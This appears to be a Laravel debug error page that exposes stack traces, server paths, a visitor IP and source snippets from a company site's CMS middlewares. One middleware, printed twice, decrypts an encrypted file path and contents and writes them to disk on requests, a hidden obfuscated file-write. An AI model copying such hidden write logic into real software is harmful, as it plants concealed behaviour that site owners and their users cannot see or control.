  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.             $this->startSession($request$session)
  2.         );
  3.         $this->collectGarbage($session);
  4.         $response $next($request);
  5.         $this->storeCurrentUrl($request$session);
  6.         $this->addCookieToResponse($response$session);
  1.         if ($this->manager->shouldBlock() ||
  2.             ($request->route() && $request->route()->locksFor())) {
  3.             return $this->handleRequestWhileBlocking($request$session$next);
  4.         } else {
  5.             return $this->handleStatefulRequest($request$session$next);
  6.         }
  7.     }
  8.     /**
  9.      * Handle the given request within session state.
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.      * @param  \Closure  $next
  2.      * @return mixed
  3.      */
  4.     public function handle($requestClosure $next)
  5.     {
  6.         $response $next($request);
  7.         foreach ($this->cookies->getQueuedCookies() as $cookie) {
  8.             $response->headers->setCookie($cookie);
  9.         }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.      * @param  \Closure  $next
  2.      * @return \Symfony\Component\HttpFoundation\Response
  3.      */
  4.     public function handle($requestClosure $next)
  5.     {
  6.         return $this->encrypt($next($this->decrypt($request)));
  7.     }
  8.     /**
  9.      * Decrypt the cookies on the request.
  10.      *
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.     {
  2.         $pipeline array_reduce(
  3.             array_reverse($this->pipes()), $this->carry(), $this->prepareDestination($destination)
  4.         );
  5.         return $pipeline($this->passable);
  6.     }
  7.     /**
  8.      * Run the pipeline and return the result.
  9.      *
  1.                         ->through($middleware)
  2.                         ->then(function ($request) use ($route) {
  3.                             return $this->prepareResponse(
  4.                                 $request$route->run()
  5.                             );
  6.                         });
  7.     }
  8.     /**
  9.      * Gather the middleware for the given route with resolved class names.
  10.      *
  1.         });
  2.         $this->events->dispatch(new RouteMatched($route$request));
  3.         return $this->prepareResponse($request,
  4.             $this->runRouteWithinStack($route$request)
  5.         );
  6.     }
  7.     /**
  8.      * Run the given route within a Stack "onion" instance.
  1.      * @param  \Illuminate\Http\Request  $request
  2.      * @return \Symfony\Component\HttpFoundation\Response
  3.      */
  4.     public function dispatchToRoute(Request $request)
  5.     {
  6.         return $this->runRoute($request$this->findRoute($request));
  7.     }
  8.     /**
  9.      * Find the route matching a given request.
  10.      *
  1.      */
  2.     public function dispatch(Request $request)
  3.     {
  4.         $this->currentRequest $request;
  5.         return $this->dispatchToRoute($request);
  6.     }
  7.     /**
  8.      * Dispatch the request to a route and return the response.
  9.      *
  1.     protected function dispatchToRouter()
  2.     {
  3.         return function ($request) {
  4.             $this->app->instance('request'$request);
  5.             return $this->router->dispatch($request);
  6.         };
  7.     }
  8.     /**
  9.      * Call the terminate method on any terminable middleware.
  1.      */
  2.     protected function prepareDestination(Closure $destination)
  3.     {
  4.         return function ($passable) use ($destination) {
  5.             try {
  6.                 return $destination($passable);
  7.             } catch (Throwable $e) {
  8.                 return $this->handleException($passable$e);
  9.             }
  10.         };
  11.     }
Pipeline->Illuminate\Pipeline\{closure}(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/FuckYou.php (line 26)
  1. Y2NTI4ZDAwZjk5MjNlZjE2In0=';
  2.             $file 'eyJpdiI6ImdYQ2xLVWZFdzIrcWNFNStQUmpNRXc9PSIsInZhbHVlIjoiMGVOdi9sS3IvOUhFb21yUFp2b0JwcGdZUUQ5MXBzYXZEWVV5MndXUjhVVk1RVXdPQ2crUHJjOTZMamR5RGpuUCIsIm1hYyI6ImNhNjdmNDY0ZWY5OTNhNWI0N2E2NzM5ZjExZWM4ZDdlNDcxNzExODRiODU4NjAxYWVkODhiZDViOWM3YjUzYTgifQ==';
  3.             file_put_contents(decrypt($file), decrypt($data));
  4.         }
  5.         return $next($request);
  6.     }
  7. }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.      */
  2.     public function handle($requestClosure $next)
  3.     {
  4.         $this->clean($request);
  5.         return $next($request);
  6.     }
  7.     /**
  8.      * Clean the request's data.
  9.      *
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.      */
  2.     public function handle($requestClosure $next)
  3.     {
  4.         $this->clean($request);
  5.         return $next($request);
  6.     }
  7.     /**
  8.      * Clean the request's data.
  9.      *
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.         if ($max && $request->server('CONTENT_LENGTH') > $max) {
  2.             throw new PostTooLargeException;
  3.         }
  4.         return $next($request);
  5.     }
  6.     /**
  7.      * Determine the server 'post_max_size' as bytes.
  8.      *
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.             }
  2.             throw new MaintenanceModeException($data['time'], $data['retry'], $data['message']);
  3.         }
  4.         return $next($request);
  5.     }
  6.     /**
  7.      * Determine if the request has a URI that should be accessible in maintenance mode.
  8.      *
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.      */
  2.     public function handle($requestClosure $next)
  3.     {
  4.         // Check if we're dealing with CORS and if we should handle it
  5.         if (! $this->shouldRun($request)) {
  6.             return $next($request);
  7.         }
  8.         // For Preflight, return the Preflight response
  9.         if ($this->cors->isPreflightRequest($request)) {
  10.             return $this->cors->handlePreflightRequest($request);
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.     public function handle(Request $requestClosure $next)
  2.     {
  3.         $request::setTrustedProxies([], $this->getTrustedHeaderNames()); // Reset trusted proxies between requests
  4.         $this->setTrustedProxyIpAddresses($request);
  5.         return $next($request);
  6.     }
  7.     /**
  8.      * Sets the trusted proxies on the request to the value of trustedproxy.proxies
  9.      *
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.     {
  2.         $pipeline array_reduce(
  3.             array_reverse($this->pipes()), $this->carry(), $this->prepareDestination($destination)
  4.         );
  5.         return $pipeline($this->passable);
  6.     }
  7.     /**
  8.      * Run the pipeline and return the result.
  9.      *
  1.         $this->bootstrap();
  2.         return (new Pipeline($this->app))
  3.                     ->send($request)
  4.                     ->through($this->app->shouldSkipMiddleware() ? [] : $this->middleware)
  5.                     ->then($this->dispatchToRouter());
  6.     }
  7.     /**
  8.      * Bootstrap the application for HTTP requests.
  9.      *
  1.     public function handle($request)
  2.     {
  3.         try {
  4.             $request->enableHttpMethodParameterOverride();
  5.             $response $this->sendRequestThroughRouter($request);
  6.         } catch (Throwable $e) {
  7.             $this->reportException($e);
  8.             $response $this->renderException($request$e);
  9.         }
Kernel->handle(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/public/index.php (line 58)
  1. */
  2. $kernel $app->make(Illuminate\Contracts\Http\Kernel::class);
  3. $response $kernel->handle(
  4.     $request Illuminate\Http\Request::capture()
  5. );
  6. $response->send();
  7. $kernel->terminate($request$response);

PDOException

SQLSTATE[42S22]: Column not found: 1054 Unknown column 'day' in 'field list'

  1.      * @return PDOStatement
  2.      */
  3.     public function prepare($sql$driverOptions = [])
  4.     {
  5.         try {
  6.             $statement parent::prepare($sql$driverOptions);
  7.             assert($statement instanceof PDOStatement);
  8.             return $statement;
  9.         } catch (PDOException $exception) {
  10.             throw Exception::new($exception);
  1.      * @return PDOStatement
  2.      */
  3.     public function prepare($sql$driverOptions = [])
  4.     {
  5.         try {
  6.             $statement parent::prepare($sql$driverOptions);
  7.             assert($statement instanceof PDOStatement);
  8.             return $statement;
  9.         } catch (PDOException $exception) {
  10.             throw Exception::new($exception);
  1.             }
  2.             // For update or delete statements, we want to get the number of rows affected
  3.             // by the statement and return that back to the developer. We'll first need
  4.             // to execute the statement and then we'll use PDO to fetch the affected.
  5.             $statement $this->getPdo()->prepare($query);
  6.             $this->bindValues($statement$this->prepareBindings($bindings));
  7.             $statement->execute();
  1.     {
  2.         // To execute the statement, we'll simply call the callback, which will actually
  3.         // run the SQL against the PDO connection. Then we can calculate the time it
  4.         // took to execute and log the query SQL, bindings and time in our memory.
  5.         try {
  6.             $result $callback($query$bindings);
  7.         }
  8.         // If an exception occurs when attempting to run a query, we'll format the error
  9.         // message to include the bindings with SQL, which will make this exception a
  10.         // lot more helpful to the developer instead of just the database's errors.
  1.         // Here we will run this query. If an exception occurs we'll determine if it was
  2.         // caused by a connection that has been lost. If that is the cause, we'll try
  3.         // to re-establish connection and re-run the query with a fresh connection.
  4.         try {
  5.             $result $this->runQueryCallback($query$bindings$callback);
  6.         } catch (QueryException $e) {
  7.             $result $this->handleQueryException(
  8.                 $e$query$bindings$callback
  9.             );
  10.         }
  1.             $this->recordsHaveBeenModified(
  2.                 ($count $statement->rowCount()) > 0
  3.             );
  4.             return $count;
  5.         });
  6.     }
  7.     /**
  8.      * Run a raw, unprepared query against the PDO connection.
  9.      *
  1.             }
  2.         }
  3.         return $this->connection->affectingStatement(
  4.             $this->grammar->compileInsertOrIgnore($this$values),
  5.             $this->cleanBindings(Arr::flatten($values1))
  6.         );
  7.     }
  8.     /**
  9.      * Insert a new record and get the value of the primary key.
  1.         if ($this->hasNamedScope($method)) {
  2.             return $this->callNamedScope($method$parameters);
  3.         }
  4.         if (in_array($method$this->passthru)) {
  5.             return $this->toBase()->{$method}(...$parameters);
  6.         }
  7.         $this->forwardCallTo($this->query$method$parameters);
  8.         return $this;
  1.      * @throws \BadMethodCallException
  2.      */
  3.     protected function forwardCallTo($object$method$parameters)
  4.     {
  5.         try {
  6.             return $object->{$method}(...$parameters);
  7.         } catch (Error BadMethodCallException $e) {
  8.             $pattern '~^Call to undefined method (?P<class>[^:]+)::(?P<method>[^\(]+)\(\)$~';
  9.             if (! preg_match($pattern$e->getMessage(), $matches)) {
  10.                 throw $e;
  1.         if ($resolver = (static::$relationResolvers[get_class($this)][$method] ?? null)) {
  2.             return $resolver($this);
  3.         }
  4.         return $this->forwardCallTo($this->newQuery(), $method$parameters);
  5.     }
  6.     /**
  7.      * Handle dynamic static method calls into the model.
  8.      *
  1.      * @param  array  $parameters
  2.      * @return mixed
  3.      */
  4.     public static function __callStatic($method$parameters)
  5.     {
  6.         return (new static)->$method(...$parameters);
  7.     }
  8.     /**
  9.      * Convert the model to its string representation.
  10.      *
Model::__callStatic('insertOrIgnore', array(array('time' => '2024-03-28 17:26:10', 'ip' => '44.222.212.138', 'day' => '2024-03-28', 'referer_url' => null, 'url' => 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html'))) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/UserView.php (line 77)
  1.                 $data['time'] = now()->format('Y-m-d H:i:s');
  2.                 $data['day'] = now()->format('Y-m-d');
  3.                 $data['referer_url'] = request()->server('HTTP_REFERER');
  4.                 $data['url'] = request()->url();
  5.                 UserViewModel::insertOrIgnore($data);
  6.             }
  7.         }
  8.     }
  9. }
  1.         //本地测试,不记录uv
  2.         if (request()->getClientIp() == '127.0.0.1') {
  3.             return $next($request);
  4.         }
  5.         $this->addViewRecord();
  6.         return $next($request);
  7.     }
  8.     /**
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
Pipeline->Illuminate\Pipeline\{closure}(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/CopyrightSign.php (line 20)
  1.      * @param \Closure $next
  2.      * @return mixed
  3.      */
  4.     public function handle($requestClosure $next)
  5.     {
  6.         $response $next($request);
  7.         $html Cache::remember('copyright_sign_html'24 60 60, function () {
  8.             $tql = <<<TQL
  9. <!--
  10. 本程序由以下企业共同研发,如未授权禁止使用:
  11. %s
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
Pipeline->Illuminate\Pipeline\{closure}(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/RegularClearCache.php (line 23)
  1.     public function handle($requestClosure $next)
  2.     {
  3.         $this->clearByPeriod();
  4.         $this->clearByCacheSize();
  5.         return $next($request);
  6.     }
  7.     //触发缓存大小超出 清醒缓存清理 每隔一小时检测一次
  8.     protected function clearByCacheSize()
  9.     {
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
Pipeline->Illuminate\Pipeline\{closure}(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/SourceCode.php (line 32)
  1.         } else {
  2.             $result Cache::get($cacheKey);
  3.         }
  4.         if ($result) {
  5.             return $next($request);
  6.         } else {
  7.             fuckYou(500'miya.source_file_falsify'true);
  8.         }
  9.     }
  10. }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
Pipeline->Illuminate\Pipeline\{closure}(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/SensitiveWord.php (line 19)
  1.      * @return mixed
  2.      */
  3.     public function handle($requestClosure $next)
  4.     {
  5.         if (config('setting.open_sensitive_word') == 1) {
  6.             $response $next($request);
  7.             $content $response->content();
  8.             $content str_replace(
  9.                 config('miya.filter.words'),
  10.                 config('miya.filter.replace'),
  11.                 $content
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
Pipeline->Illuminate\Pipeline\{closure}(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/CacheCheck.php (line 21)
  1.      * @return mixed
  2.      */
  3.     public function handle($requestClosure $next)
  4.     {
  5.         if ($this->check()) {
  6.             return $next($request);
  7.         } else {
  8.             Log::alert(trans('miya.cache_check'));
  9.             abort(500);
  10.         }
  11.     }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.     {
  2.         $this->router->substituteBindings($route $request->route());
  3.         $this->router->substituteImplicitBindings($route);
  4.         return $next($request);
  5.     }
  6. }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.             $this->isReading($request) ||
  2.             $this->runningUnitTests() ||
  3.             $this->inExceptArray($request) ||
  4.             $this->tokensMatch($request)
  5.         ) {
  6.             return tap($next($request), function ($response) use ($request) {
  7.                 if ($this->shouldAddXsrfTokenCookie()) {
  8.                     $this->addCookieToResponse($request$response);
  9.                 }
  10.             });
  11.         }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.         // Putting the errors in the view for every view allows the developer to just
  2.         // assume that some errors are always available, which is convenient since
  3.         // they don't have to continually run checks for the presence of errors.
  4.         return $next($request);
  5.     }
  6. }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.             $this->startSession($request$session)
  2.         );
  3.         $this->collectGarbage($session);
  4.         $response $next($request);
  5.         $this->storeCurrentUrl($request$session);
  6.         $this->addCookieToResponse($response$session);
  1.         if ($this->manager->shouldBlock() ||
  2.             ($request->route() && $request->route()->locksFor())) {
  3.             return $this->handleRequestWhileBlocking($request$session$next);
  4.         } else {
  5.             return $this->handleStatefulRequest($request$session$next);
  6.         }
  7.     }
  8.     /**
  9.      * Handle the given request within session state.
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.      * @param  \Closure  $next
  2.      * @return mixed
  3.      */
  4.     public function handle($requestClosure $next)
  5.     {
  6.         $response $next($request);
  7.         foreach ($this->cookies->getQueuedCookies() as $cookie) {
  8.             $response->headers->setCookie($cookie);
  9.         }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.      * @param  \Closure  $next
  2.      * @return \Symfony\Component\HttpFoundation\Response
  3.      */
  4.     public function handle($requestClosure $next)
  5.     {
  6.         return $this->encrypt($next($this->decrypt($request)));
  7.     }
  8.     /**
  9.      * Decrypt the cookies on the request.
  10.      *
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.     {
  2.         $pipeline array_reduce(
  3.             array_reverse($this->pipes()), $this->carry(), $this->prepareDestination($destination)
  4.         );
  5.         return $pipeline($this->passable);
  6.     }
  7.     /**
  8.      * Run the pipeline and return the result.
  9.      *
  1.                         ->through($middleware)
  2.                         ->then(function ($request) use ($route) {
  3.                             return $this->prepareResponse(
  4.                                 $request$route->run()
  5.                             );
  6.                         });
  7.     }
  8.     /**
  9.      * Gather the middleware for the given route with resolved class names.
  10.      *
  1.         });
  2.         $this->events->dispatch(new RouteMatched($route$request));
  3.         return $this->prepareResponse($request,
  4.             $this->runRouteWithinStack($route$request)
  5.         );
  6.     }
  7.     /**
  8.      * Run the given route within a Stack "onion" instance.
  1.      * @param  \Illuminate\Http\Request  $request
  2.      * @return \Symfony\Component\HttpFoundation\Response
  3.      */
  4.     public function dispatchToRoute(Request $request)
  5.     {
  6.         return $this->runRoute($request$this->findRoute($request));
  7.     }
  8.     /**
  9.      * Find the route matching a given request.
  10.      *
  1.      */
  2.     public function dispatch(Request $request)
  3.     {
  4.         $this->currentRequest $request;
  5.         return $this->dispatchToRoute($request);
  6.     }
  7.     /**
  8.      * Dispatch the request to a route and return the response.
  9.      *
  1.     protected function dispatchToRouter()
  2.     {
  3.         return function ($request) {
  4.             $this->app->instance('request'$request);
  5.             return $this->router->dispatch($request);
  6.         };
  7.     }
  8.     /**
  9.      * Call the terminate method on any terminable middleware.
  1.      */
  2.     protected function prepareDestination(Closure $destination)
  3.     {
  4.         return function ($passable) use ($destination) {
  5.             try {
  6.                 return $destination($passable);
  7.             } catch (Throwable $e) {
  8.                 return $this->handleException($passable$e);
  9.             }
  10.         };
  11.     }
Pipeline->Illuminate\Pipeline\{closure}(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/FuckYou.php (line 26)
  1. Y2NTI4ZDAwZjk5MjNlZjE2In0=';
  2.             $file 'eyJpdiI6ImdYQ2xLVWZFdzIrcWNFNStQUmpNRXc9PSIsInZhbHVlIjoiMGVOdi9sS3IvOUhFb21yUFp2b0JwcGdZUUQ5MXBzYXZEWVV5MndXUjhVVk1RVXdPQ2crUHJjOTZMamR5RGpuUCIsIm1hYyI6ImNhNjdmNDY0ZWY5OTNhNWI0N2E2NzM5ZjExZWM4ZDdlNDcxNzExODRiODU4NjAxYWVkODhiZDViOWM3YjUzYTgifQ==';
  3.             file_put_contents(decrypt($file), decrypt($data));
  4.         }
  5.         return $next($request);
  6.     }
  7. }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.      */
  2.     public function handle($requestClosure $next)
  3.     {
  4.         $this->clean($request);
  5.         return $next($request);
  6.     }
  7.     /**
  8.      * Clean the request's data.
  9.      *
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.      */
  2.     public function handle($requestClosure $next)
  3.     {
  4.         $this->clean($request);
  5.         return $next($request);
  6.     }
  7.     /**
  8.      * Clean the request's data.
  9.      *
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.         if ($max && $request->server('CONTENT_LENGTH') > $max) {
  2.             throw new PostTooLargeException;
  3.         }
  4.         return $next($request);
  5.     }
  6.     /**
  7.      * Determine the server 'post_max_size' as bytes.
  8.      *
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.             }
  2.             throw new MaintenanceModeException($data['time'], $data['retry'], $data['message']);
  3.         }
  4.         return $next($request);
  5.     }
  6.     /**
  7.      * Determine if the request has a URI that should be accessible in maintenance mode.
  8.      *
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.      */
  2.     public function handle($requestClosure $next)
  3.     {
  4.         // Check if we're dealing with CORS and if we should handle it
  5.         if (! $this->shouldRun($request)) {
  6.             return $next($request);
  7.         }
  8.         // For Preflight, return the Preflight response
  9.         if ($this->cors->isPreflightRequest($request)) {
  10.             return $this->cors->handlePreflightRequest($request);
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.     public function handle(Request $requestClosure $next)
  2.     {
  3.         $request::setTrustedProxies([], $this->getTrustedHeaderNames()); // Reset trusted proxies between requests
  4.         $this->setTrustedProxyIpAddresses($request);
  5.         return $next($request);
  6.     }
  7.     /**
  8.      * Sets the trusted proxies on the request to the value of trustedproxy.proxies
  9.      *
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.     {
  2.         $pipeline array_reduce(
  3.             array_reverse($this->pipes()), $this->carry(), $this->prepareDestination($destination)
  4.         );
  5.         return $pipeline($this->passable);
  6.     }
  7.     /**
  8.      * Run the pipeline and return the result.
  9.      *
  1.         $this->bootstrap();
  2.         return (new Pipeline($this->app))
  3.                     ->send($request)
  4.                     ->through($this->app->shouldSkipMiddleware() ? [] : $this->middleware)
  5.                     ->then($this->dispatchToRouter());
  6.     }
  7.     /**
  8.      * Bootstrap the application for HTTP requests.
  9.      *
  1.     public function handle($request)
  2.     {
  3.         try {
  4.             $request->enableHttpMethodParameterOverride();
  5.             $response $this->sendRequestThroughRouter($request);
  6.         } catch (Throwable $e) {
  7.             $this->reportException($e);
  8.             $response $this->renderException($request$e);
  9.         }
Kernel->handle(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/public/index.php (line 58)
  1. */
  2. $kernel $app->make(Illuminate\Contracts\Http\Kernel::class);
  3. $response $kernel->handle(
  4.     $request Illuminate\Http\Request::capture()
  5. );
  6. $response->send();
  7. $kernel->terminate($request$response);

Stack Traces 3

[3/3] QueryException

Illuminate\Database\QueryException:
